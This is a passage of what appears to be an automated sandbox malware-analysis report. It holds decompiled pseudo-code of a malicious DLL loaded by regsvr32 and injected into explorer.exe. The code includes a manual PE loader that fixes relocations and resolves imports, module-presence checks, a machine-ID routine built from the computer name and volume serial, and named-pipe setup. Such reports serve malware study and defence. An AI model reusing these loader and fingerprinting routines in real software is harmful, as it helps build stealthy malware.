                            													_pop(_t262);
                            												}
                            											}
                            										}
                            										goto L36;
                            									}
                            									__eflags = _t262 - 2;
                            									if(_t262 != 2) {
                            										goto L36;
                            									}
                            									E100049A5();
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									_t211 =  *0x1001e684; // 0x19afaa0
                            									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                            									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                            									_v628 = _t215;
                            									_t277 = 0x3c;
                            									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                            									_t249 = E10008604(0x1000);
                            									_v624 = _t249;
                            									_pop(_t278);
                            									__eflags = _t249;
                            									if(_t249 != 0) {
                            										_t220 = E100095E1(_t278, 0x32d);
                            										_t280 =  *0x1001e688; // 0x1930590
                            										_push(_t280 + 0x228);
                            										_t282 = 0x3c;
                            										_v636 = _t220;
                            										_push(_v628 % _t282 & 0x0000ffff);
                            										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                            										E100085D5( &_v636);
                            										E1000A911(_t249, 0, 0xbb8, 1);
                            										E1000861A( &_v624, 0xfffffffe);
                            									}
                            									goto L41;
                            								}
                            							}
                            						} else {
                            							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                            							__eflags = _t238 - _t246;
                            							if(_t238 == _t246) {
                            								goto L17;
                            							}
                            							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                            							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                            								L36:
                            								_t144 = E100095E1(_t262, 0x610);
                            								_push(0);
                            								_push(_t144);
                            								_v616 = _t144;
                            								_t145 =  *0x1001e688; // 0x1930590
                            								_t329 = E100092E5(_t145 + 0x228);
                            								_v612 = _t329;
                            								__eflags = _t329;
                            								if(_t329 != 0) {
                            									_t160 = E1000B269(_t329);
                            									__eflags = _t160;
                            									if(_t160 != 0) {
                            										_t163 =  *0x1001e684; // 0x19afaa0
                            										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                            									}
                            									E1000861A( &_v612, 0xfffffffe);
                            								}
                            								E100085D5( &_v616);
                            								_t150 =  *0x1001e688; // 0x1930590
                            								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                            								_t153 =  *0x1001e688; // 0x1930590
                            								_t154 = _t153 + 0x228;
                            								__eflags = _t154;
                            								lstrcpynW(_t154,  *0x1001e738, 0x105);
                            								_t331 =  *0x1001e688; // 0x1930590
                            								_t117 = _t331 + 0x228; // 0x19307b8
                            								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
                            								E1000861A(0x1001e740, 0xfffffffe);
                            								E1000861A(0x1001e738, 0xfffffffe);
                            								L41:
                            								_t159 = 0;
                            								__eflags = 0;
                            								L42:
                            								return _t159;
                            							}
                            							__eflags = _t238 - 2;
                            							if(_t238 != 2) {
                            								goto L36;
                            							}
                            							goto L17;
                            						}
                            					}
                            					L8:
                            					_t159 = _t122 | 0xffffffff;
                            					goto L42;
                            				}
                            				_t250 = E100095C7(0x6e2);
                            				_v616 = _t250;
                            				_t326 = E100095C7(0x9f5);
                            				_v612 = _t326;
                            				if(_t250 != 0 && _t326 != 0) {
                            					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                            						_v620 = 1;
                            					}
                            					E100085C2( &_v616);
                            					_t122 = E100085C2( &_v612);
                            					_t351 = _v620;
                            					if(_v620 != 0) {
                            						goto L8;
                            					}
                            				}
                            			}


                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                            • lstrcpynW.KERNEL32(01930158,00000105), ref: 1000526F
                            • lstrcpynW.KERNEL32(01930368,00000105), ref: 10005283
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                            • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 52%
                            			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				signed int _v5;
                            				signed short _v12;
                            				intOrPtr* _v16;
                            				signed int* _v20;
                            				intOrPtr _v24;
                            				unsigned int _v28;
                            				signed short* _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr* _v40;
                            				signed short* _v44;
                            				intOrPtr _v48;
                            				unsigned int _v52;
                            				intOrPtr _v56;
                            				_Unknown_base(*)()* _v60;
                            				signed int _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				unsigned int _v76;
                            				intOrPtr _v80;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				signed int _t149;
                            				void* _t189;
                            				signed int _t194;
                            				signed int _t196;
                            				intOrPtr _t236;
                            
                            				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            				_v24 = _v72;
                            				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                            				_v56 = _t236;
                            				if(_t236 == 0) {
                            					L13:
                            					while(0 != 0) {
                            					}
                            					_push(8);
                            					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                            						L35:
                            						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                            						while(0 != 0) {
                            						}
                            						if(_a12 != 0) {
                            							 *_a12 = _v68;
                            						}
                            						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                            						return _v68(_a4, 1, _a8);
                            					}
                            					_v84 = 0x80000000;
                            					_t149 = 8;
                            					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						if(_v36 == 0) {
                            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						}
                            						if(_v36 != 0) {
                            							if( *_v16 == 0) {
                            								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                            							} else {
                            								_v20 =  *_v16 + _a4;
                            							}
                            							_v64 = _v64 & 0x00000000;
                            							while( *_v20 != 0) {
                            								if(( *_v20 & _v84) == 0) {
                            									_v88 =  *_v20 + _a4;
                            									_v60 = GetProcAddress(_v36, _v88 + 2);
                            								} else {
                            									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                            								}
                            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                            									 *_v20 = _v60;
                            								} else {
                            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                            								}
                            								_v20 =  &(_v20[1]);
                            								_v64 = _v64 + 4;
                            							}
                            							_v16 = _v16 + 0x14;
                            							continue;
                            						} else {
                            							_t189 = 0xfffffffd;
                            							return _t189;
                            						}
                            					}
                            					goto L35;
                            				}
                            				_t194 = 8;
                            				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                            				_t196 = 8;
                            				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                            				while(0 != 0) {
                            				}
                            				while(_v48 > 0) {
                            					_v28 = _v44[2];
                            					_v48 = _v48 - _v28;
                            					_v28 = _v28 - 8;
                            					_v28 = _v28 >> 1;
                            					_v32 =  &(_v44[4]);
                            					_v80 = _a4 +  *_v44;
                            					_v52 = _v28;
                            					while(1) {
                            						_v76 = _v52;
                            						_v52 = _v52 - 1;
                            						if(_v76 == 0) {
                            							break;
                            						}
                            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                            						_v12 =  *_v32 & 0xfff;
                            						_v40 = (_v12 & 0x0000ffff) + _v80;
                            						if((_v5 & 0x000000ff) != 3) {
                            							if((_v5 & 0x000000ff) == 0xa) {
                            								 *_v40 =  *_v40 + _v56;
                            							}
                            						} else {
                            							 *_v40 =  *_v40 + _v56;
                            						}
                            						_v32 =  &(_v32[1]);
                            					}
                            					_v44 = _v32;
                            				}
                            				goto L13;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                            • LoadLibraryA.KERNEL32(?), ref: 10012C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
                            				char _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v28;
                            				void* _t13;
                            				intOrPtr _t15;
                            				signed int _t16;
                            				intOrPtr _t17;
                            				signed int _t18;
                            				char _t20;
                            				intOrPtr _t22;
                            				void* _t23;
                            				void* _t24;
                            				intOrPtr _t29;
                            				intOrPtr _t35;
                            				intOrPtr _t41;
                            				intOrPtr _t43;
                            				intOrPtr _t48;
                            				void* _t51;
                            				signed int _t61;
                            				signed int _t64;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t61 = __ecx;
                            				_t41 =  *0x1001e6dc; // 0x0
                            				_t13 = E1000A4BF(_t41, 0);
                            				while(_t13 < 0) {
                            					E1000980C( &_v28);
                            					_t43 =  *0x1001e6e0; // 0x0
                            					_t15 =  *0x1001e6e4; // 0x0
                            					_t41 = _t43 + 0xe10;
                            					asm("adc eax, ebx");
                            					__eflags = _t15 - _v24;
                            					if(__eflags > 0) {
                            						L9:
                            						_t16 = 0xfffffffe;
                            						L13:
                            						return _t16;
                            					}
                            					if(__eflags < 0) {
                            						L4:
                            						_t17 =  *0x1001e684; // 0x19afaa0
                            						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                            						__eflags = _t18;
                            						if(_t18 == 0) {
                            							break;
                            						}
                            						_t35 =  *0x1001e684; // 0x19afaa0
                            						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                            						_t41 =  *0x1001e6dc; // 0x0
                            						__eflags = 0;
                            						_t13 = E1000A4BF(_t41, 0);
                            						continue;
                            					}
                            					__eflags = _t41 - _v28;
                            					if(_t41 >= _v28) {
                            						goto L9;
                            					}
                            					goto L4;
                            				}
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t20 =  *0x1001e6e8; // 0x0
                            				_v28 = _t20;
                            				_t22 = E1000A6A9(_t41, _t61,  &_v16);
                            				_v20 = _t22;
                            				if(_t22 != 0) {
                            					_t23 = GetCurrentProcess();
                            					_t24 = GetCurrentThread();
                            					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                            					E1000980C(0x1001e6e0);
                            					_t64 = E10001A1B( &_v28, E10001226, _t71);
                            					__eflags = _t64;
                            					if(_t64 >= 0) {
                            						_push(0);
                            						_push( *0x1001e760);
                            						_t51 = 0x27;
                            						E10009F06(_t51);
                            					}
                            				} else {
                            					_t64 = _t61 | 0xffffffff;
                            				}
                            				_t29 =  *0x1001e684; // 0x19afaa0
                            				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                            				_t48 =  *0x1001e6dc; // 0x0
                            				 *0x1001e6d0 = 0;
                            				E1000A4DB(_t48);
                            				E1000861A( &_v24, 0);
                            				_t16 = _t64;
                            				goto L13;
                            			}

                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E10001B2D(void* __eflags, void* __fp0) {
                            				char _v24;
                            				char _v28;
                            				void* _t12;
                            				intOrPtr _t14;
                            				void* _t15;
                            				intOrPtr _t16;
                            				void* _t17;
                            				void* _t19;
                            				void* _t20;
                            				char _t24;
                            				intOrPtr _t26;
                            				intOrPtr _t28;
                            				intOrPtr _t33;
                            				intOrPtr _t38;
                            				intOrPtr _t40;
                            				void* _t41;
                            				intOrPtr _t46;
                            				void* _t48;
                            				intOrPtr _t51;
                            				void* _t61;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t38 =  *0x1001e6f4; // 0x0
                            				_t12 = E1000A4BF(_t38, 0);
                            				while(_t12 < 0) {
                            					E1000980C( &_v28);
                            					_t40 =  *0x1001e700; // 0x0
                            					_t14 =  *0x1001e704; // 0x0
                            					_t41 = _t40 + 0x3840;
                            					asm("adc eax, ebx");
                            					__eflags = _t14 - _v24;
                            					if(__eflags > 0) {
                            						L13:
                            						_t15 = 0;
                            					} else {
                            						if(__eflags < 0) {
                            							L4:
                            							_t16 =  *0x1001e684; // 0x19afaa0
                            							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                            							__eflags = _t17;
                            							if(_t17 == 0) {
                            								break;
                            							} else {
                            								_t33 =  *0x1001e684; // 0x19afaa0
                            								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                            								_t51 =  *0x1001e6f4; // 0x0
                            								__eflags = 0;
                            								_t12 = E1000A4BF(_t51, 0);
                            								continue;
                            							}
                            						} else {
                            							__eflags = _t41 - _v28;
                            							if(_t41 >= _v28) {
                            								goto L13;
                            							} else {
                            								goto L4;
                            							}
                            						}
                            					}
                            					L12:
                            					return _t15;
                            				}
                            				E1000980C(0x1001e700);
                            				_t19 = GetCurrentProcess();
                            				_t20 = GetCurrentThread();
                            				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t24 =  *0x1001e6e8; // 0x0
                            				_v28 = _t24;
                            				_t61 = E10001A1B( &_v28, E1000131E, _t71);
                            				if(_t61 >= 0) {
                            					_push(0);
                            					_push( *0x1001e760);
                            					_t48 = 0x27;
                            					E10009F06(_t48);
                            				}
                            				if(_v24 != 0) {
                            					E10006890( &_v24);
                            				}
                            				_t26 =  *0x1001e684; // 0x19afaa0
                            				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                            				_t28 =  *0x1001e758; // 0x0
                            				 *0x1001e6ec = 0;
                            				_t29 =  !=  ? 1 : _t28;
                            				_t46 =  *0x1001e6f4; // 0x0
                            				 *0x1001e758 =  !=  ? 1 : _t28;
                            				E1000A4DB(_t46);
                            				_t15 = _t61;
                            				goto L12;
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                            • DuplicateHandle.KERNEL32 ref: 10001BD9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            C-Code - Quality: 100%
                            			E00085A61(void* __eflags) {
                            				intOrPtr _t2;
                            				void* _t6;
                            				void* _t7;
                            
                            				_t2 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
                            				E00085631(_t6, _t7); // executed
                            				return 0;
                            			}

                            APIs
                            • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHandlerVectored
                            • String ID:
                            • API String ID: 3310709589-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Figure: control-flow graph of the function starting at 84a0b; legend: Executed / Not Executed]
                            C-Code - Quality: 80%
                            			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                            				char _v516;
                            				void _v1044;
                            				char _v1076;
                            				signed int _v1080;
                            				signed int _v1096;
                            				WCHAR* _v1100;
                            				intOrPtr _v1104;
                            				signed int _v1108;
                            				CHAR* _v1112;
                            				char _v1116;
                            				void* __esi;
                            				intOrPtr _t66;
                            				CHAR* _t73;
                            				signed int _t75;
                            				intOrPtr _t76;
                            				signed int _t80;
                            				signed int _t81;
                            				WCHAR* _t87;
                            				void* _t89;
                            				signed int _t90;
                            				signed int _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				WCHAR* _t96;
                            				CHAR* _t106;
                            				void* _t108;
                            				intOrPtr _t109;
                            				signed char _t116;
                            				WCHAR* _t118;
                            				void* _t122;
                            				signed int _t123;
                            				intOrPtr _t125;
                            				void* _t128;
                            				void* _t129;
                            				WCHAR* _t130;
                            				void* _t134;
                            				void* _t141;
                            				void* _t143;
                            				WCHAR* _t145;
                            				signed int _t153;
                            				void* _t154;
                            				void* _t178;
                            				signed int _t180;
                            				void* _t181;
                            				void* _t183;
                            				void* _t187;
                            				signed int _t188;
                            				WCHAR* _t190;
                            				signed int _t191;
                            				signed int _t192;
                            				intOrPtr* _t194;
                            				signed int _t196;
                            				void* _t199;
                            				void* _t200;
                            				void* _t201;
                            				void* _t202;
                            				intOrPtr* _t203;
                            				void* _t208;
                            
                            				_t208 = __fp0;
                            				_push(_t191);
                            				_t128 = __edx;
                            				_t187 = __ecx;
                            				_t192 = _t191 | 0xffffffff;
                            				memset( &_v1044, 0, 0x20c);
                            				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                            				_v1108 = 1;
                            				if(_t187 != 0) {
                            					_t123 =  *0x9e688; // 0xb0000
                            					_t125 =  *0x9e68c; // 0xc2fab8
                            					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                            				}
                            				if(E0008BB8D(_t187) != 0) {
                            					L4:
                            					_t134 = _t128; // executed
                            					_t66 = E0008B7A8(_t134,  &_v516); // executed
                            					_push(_t134);
                            					_v1104 = _t66;
                            					E0008B67D(_t66,  &_v1076, _t206, _t208);
                            					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
                            					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
                            					E0008B88A(_t141,  &_v1100, _t208);
                            					_t175 =  &_v1076;
                            					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
                            					_v1112 = _t73;
                            					_t143 = _t141;
                            					if(_t73 != 0) {
                            						_push(0);
                            						_push(_t129);
                            						_push("\\");
                            						_t130 = E000892E5(_t73);
                            						_t200 = _t199 + 0x10;
                            						_t75 =  *0x9e688; // 0xb0000
                            						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                            						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                            							L12:
                            							__eflags = _v1108;
                            							if(__eflags != 0) {
                            								_t76 = E000891E3(_v1112);
                            								_t145 = _t130;
                            								 *0x9e740 = _t76;
                            								 *0x9e738 = E000891E3(_t145);
                            								L17:
                            								_push(_t145);
                            								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                            								_t188 = _t80;
                            								_t201 = _t200 + 0x10;
                            								__eflags = _t188;
                            								if(_t188 == 0) {
                            									goto L41;
                            								}
                            								_push(0x9b9ca);
                            								E00089F48(0xe); // executed
                            								E00089F6C(_t188, _t208, _t130); // executed
                            								_t194 = _a4;
                            								_v1096 = _v1096 & 0x00000000;
                            								_push(2);
                            								_v1100 =  *_t194;
                            								_push(8);
                            								_push( &_v1100);
                            								_t178 = 0xb; // executed
                            								E0008A0AB(_t188, _t178, _t208); // executed
                            								_t179 =  *(_t194 + 0x10);
                            								_t202 = _t201 + 0xc;
                            								__eflags =  *(_t194 + 0x10);
                            								if( *(_t194 + 0x10) != 0) {
                            									E0008A3ED(_t188, _t179, _t208);
                            								}
                            								_t180 =  *(_t194 + 0xc);
                            								__eflags = _t180;
                            								if(_t180 != 0) {
                            									E0008A3ED(_t188, _t180, _t208); // executed
                            								}
                            								_t87 = E0008980C(0);
                            								_push(2);
                            								_v1100 = _t87;
                            								_t153 = _t188;
                            								_push(8);
                            								_v1096 = _t180;
                            								_push( &_v1100);
                            								_t181 = 2; // executed
                            								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
                            								_t203 = _t202 + 0xc;
                            								__eflags = _v1108;
                            								if(_v1108 == 0) {
                            									_t153 =  *0x9e688; // 0xb0000
                            									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
                            										_t203 = _t203 + 0xc;
                            										goto L26;
                            									}
                            									_t153 = _t153 + 0x228;
                            									goto L25;
                            								} else {
                            									_t91 =  *0x9e688; // 0xb0000
                            									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										L32:
                            										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                            										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                            											_t183 = 0x64;
                            											E0008E23E(_t183);
                            										}
                            										E000852C0( &_v1076, _t208);
                            										_t190 = _a8;
                            										_t154 = _t153;
                            										__eflags = _t190;
                            										if(_t190 != 0) {
                            											_t94 =  *0x9e688; // 0xb0000
                            											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                            											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                            												lstrcpyW(_t190, _t130);
                            											} else {
                            												_t96 = E0008109A(_t154, 0x228);
                            												_v1100 = _t96;
                            												lstrcpyW(_t190, _t96);
                            												E000885D5( &_v1100);
                            												 *_t203 = "\"";
                            												lstrcatW(_t190, ??);
                            												lstrcatW(_t190, _t130);
                            												lstrcatW(_t190, "\"");
                            											}
                            										}
                            										_t93 = _a12;
                            										__eflags = _t93;
                            										if(_t93 != 0) {
                            											 *_t93 = _v1104;
                            										}
                            										_t192 = 0;
                            										__eflags = 0;
                            										goto L41;
                            									}
                            									_t51 = _t91 + 0x228; // 0xb0228
                            									_t153 = _t51;
                            									L25:
                            									_t90 = E0008553F(_t153, _t130, __eflags);
                            									L26:
                            									__eflags = _t90;
                            									if(_t90 >= 0) {
                            										_t91 =  *0x9e688; // 0xb0000
                            										goto L32;
                            									}
                            									_push(0xfffffffd);
                            									L6:
                            									_pop(_t192);
                            									goto L41;
                            								}
                            							}
                            							_t106 = E0008C292(_v1104, __eflags);
                            							_v1112 = _t106;
                            							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                            							__eflags = _t108 - _t192;
                            							if(_t108 != _t192) {
                            								_t109 =  *0x9e684; // 0xc2f8f0
                            								 *((intOrPtr*)(_t109 + 0x30))();
                            								E0008861A( &_v1116, _t192);
                            								_t145 = _t108;
                            								goto L17;
                            							}
                            							E0008861A( &_v1112, _t192);
                            							_t81 = 1;
                            							goto L42;
                            						}
                            						_t116 =  *(_t75 + 0x1898);
                            						__eflags = _t116 & 0x00000004;
                            						if((_t116 & 0x00000004) == 0) {
                            							__eflags = _t116;
                            							if(_t116 != 0) {
                            								goto L12;
                            							}
                            							L11:
                            							E0008E286(_v1112, _t175); // executed
                            							goto L12;
                            						}
                            						_v1080 = _v1080 & 0x00000000;
                            						_t118 = E000895E1(_t143, 0x879);
                            						_v1100 = _t118;
                            						_t175 = _t118;
                            						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                            						E000885D5( &_v1100);
                            						_t200 = _t200 + 0x14;
                            						goto L11;
                            					}
                            					_push(0xfffffffe);
                            					goto L6;
                            				} else {
                            					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
                            					_t206 = _t122;
                            					if(_t122 == 0) {
                            						L41:
                            						_t81 = _t192;
                            						L42:
                            						return _t81;
                            					}
                            					goto L4;
                            				}
                            			}

                            APIs
                            • memset.MSVCRT ref: 00084A2D
                            • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
                            • lstrcatW.KERNEL32 ref: 00084D3D
                            • lstrcatW.KERNEL32 ref: 00084D41
                            • lstrcatW.KERNEL32 ref: 00084D49
                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$CreateNamedPipememset
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008B7A8(WCHAR* __ecx, void* __edx) {
                            				long _v8;
                            				long _v12;
                            				WCHAR* _v16;
                            				short _v528;
                            				short _v1040;
                            				short _v1552;
                            				WCHAR* _t27;
                            				signed int _t29;
                            				void* _t33;
                            				long _t38;
                            				WCHAR* _t43;
                            				WCHAR* _t56;
                            
                            				_t44 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t43 = __edx;
                            				_t56 = __ecx;
                            				memset(__edx, 0, 0x100);
                            				_v12 = 0x100;
                            				GetComputerNameW( &_v528,  &_v12);
                            				lstrcpynW(_t43,  &_v528, 0x100);
                            				_t27 = E000895E1(_t44, 0xa88);
                            				_v16 = _t27;
                            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                            				asm("sbb eax, eax");
                            				_v8 = _v8 &  ~_t29;
                            				E000885D5( &_v16);
                            				_t33 = E0008C392(_t43);
                            				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                            				lstrcatW(_t43, _t56);
                            				_t38 = E0008C392(_t43);
                            				_v12 = _t38;
                            				CharUpperBuffW(_t43, _t38);
                            				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
                            			}

                            APIs
                            • memset.MSVCRT ref: 0008B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                              • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                            • lstrcatW.KERNEL32 ref: 0008B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008CF84(void* __ecx) {
                            				intOrPtr _t11;
                            				long _t12;
                            				intOrPtr _t17;
                            				intOrPtr _t18;
                            				struct _OSVERSIONINFOA* _t29;
                            
                            				_push(__ecx);
                            				_t29 =  *0x9e688; // 0xb0000
                            				GetCurrentProcess();
                            				_t11 = E0008BA05(); // executed
                            				_t1 = _t29 + 0x1644; // 0xb1644
                            				_t25 = _t1;
                            				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                            				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                            				_t33 = _t12;
                            				if(_t12 != 0) {
                            					_t12 = E00088FBE(_t25, _t33);
                            				}
                            				_t3 = _t29 + 0x228; // 0xb0228
                            				 *(_t29 + 0x1854) = _t12;
                            				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
                            				memset(_t29, 0, 0x9c);
